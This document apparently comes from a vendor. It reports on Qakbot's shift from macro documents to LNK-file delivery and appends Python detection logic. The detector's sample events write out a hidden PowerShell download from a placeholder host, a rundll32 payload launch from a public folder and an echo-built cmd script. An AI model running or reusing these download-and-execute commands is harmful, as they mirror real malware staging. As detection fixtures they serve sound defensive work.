The operators of the Qakbot malware have been observed transforming their delivery vectors in an attempt to evade detection. Qakbot has been a recurring threat since late 2007, evolving from its initial purpose as a banking trojan to a more sophisticated and modular information stealer capable of deploying next-stage payloads such as ransomware.
Early in 2022, Qakbot's initial tactic was to deliver the malware via Excel 4.0 (XLM) macros embedded in malicious Microsoft Office documents. These documents were delivered through phishing emails whose subjects and attachment names commonly used finance and business-operations keywords to entice the user into opening and executing them. Over the past few months, however, Qakbot has instead used shortcut (LNK) files as the delivery method for the malware. This shift is likely a response to Microsoft's decision to block macro execution. The latest LNK payloads have also varied the process used to execute the main Qakbot DLL, sometimes opting for rundll32.exe instead of regsvr32.exe. The download method also differs between recent variants: some use powershell.exe to download and execute the main DLL payload, while others use a combination of cmd.exe and curl.exe to download the file and then execute it.
These varying methodologies are a clear sign of Qakbot evolving not only to evade security practices and defenses, but also to adapt to major changes in the underlying infrastructure it abuses. It is likely that Qakbot, and other malware families, will continue to adapt.
It is highly recommended to implement and maintain appropriate email security controls, including AV scanning and attachment sandboxing, in every environment. Qakbot and other malware frequently use phishing emails as an infection vector, so these controls can stop malicious payloads before they reach end users. Endpoint security controls, such as an EDR, should also be in place on all systems within an environment. These not only prevent malware from executing properly, but can also alert on malware that was not blocked. All of the Qakbot infection-process variants exhibit behavior that would be considered suspicious under normal circumstances: PowerShell downloading a file from an external source, rundll32 or regsvr32 executing a payload from an abnormal directory, and long command lines containing multiple echo executions are all behaviors that can be monitored for and alerted upon. Binary Defense's Managed Detection and Response service is an excellent asset to assist with these types of detection needs.
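As an added example that is not part of the original post, the three suspicious behaviors described above expressed as simple detection logic over process-creation records. The record format, the "normal" DLL directories, the command-line length and echo-count thresholds, and the sample events are all constructed assumptions for illustration, not values from the post.

```python
import re
from dataclasses import dataclass

@dataclass
class ProcessEvent:
    """One process-creation record (e.g. a Sysmon event 1), constructed for this example."""
    image: str
    command_line: str

# Assumed "normal" locations for a DLL handed to rundll32/regsvr32; anything else is abnormal.
NORMAL_DLL_DIRS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")
# Assumed thresholds for the "long command line with multiple echo executions" behavior.
LONG_CMDLINE = 200
MIN_ECHOES = 3

_PATH = re.compile(r'[a-z]:\\[^"\s,]+')
_DOWNLOAD = re.compile(r"https?://|downloadfile|downloadstring|invoke-webrequest|\biwr\b|start-bitstransfer")

def flags_for(event: ProcessEvent) -> list[str]:
    """Return the suspicious-behavior labels that apply to a single process event."""
    cl = event.command_line.lower()
    image_name = event.image.lower().rsplit("\\", 1)[-1]
    flags = []
    # Behavior 1: PowerShell fetching content from an external source.
    if image_name == "powershell.exe" and _DOWNLOAD.search(cl):
        flags.append("powershell_external_download")
    # Behavior 2: rundll32/regsvr32 given a payload path outside the usual system directories.
    if image_name in ("rundll32.exe", "regsvr32.exe"):
        payloads = [p for p in _PATH.findall(cl) if not p.endswith(image_name)]
        if any(not p.startswith(NORMAL_DLL_DIRS) for p in payloads):
            flags.append(f"{image_name[:-4]}_abnormal_payload_dir")
    # Behavior 3: long cmd.exe command line built from many echo statements.
    if image_name == "cmd.exe" and len(cl) >= LONG_CMDLINE and cl.count("echo ") >= MIN_ECHOES:
        flags.append("cmd_long_multi_echo")
    return flags

def scan(events: list[ProcessEvent]) -> dict[int, list[str]]:
    """Map event index -> flags for every event that matched at least one behavior."""
    return {i: f for i, ev in enumerate(events) if (f := flags_for(ev))}

# Constructed sample events: three that mimic the behaviors above and one benign regsvr32 call.
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 'powershell.exe -w hidden -c "Invoke-WebRequest http://example.invalid/p.dat -OutFile C:\\Users\\Public\\p.dat"'),
    ProcessEvent(r"C:\Windows\System32\rundll32.exe", r"rundll32.exe C:\Users\Public\p.dat,DllRegisterServer"),
    ProcessEvent(r"C:\Windows\System32\cmd.exe",
                 "cmd.exe /c " + " & ".join(f"echo part{n} >> C:\\Users\\Public\\s.cmd" for n in range(8))),
    ProcessEvent(r"C:\Windows\System32\regsvr32.exe", r"regsvr32.exe /s C:\Windows\System32\msxml3.dll"),
]
```

Running `scan(SAMPLE_EVENTS)` flags the first three events and leaves the benign regsvr32 call unflagged; in practice the thresholds and directory list should be tuned against the environment's own baseline.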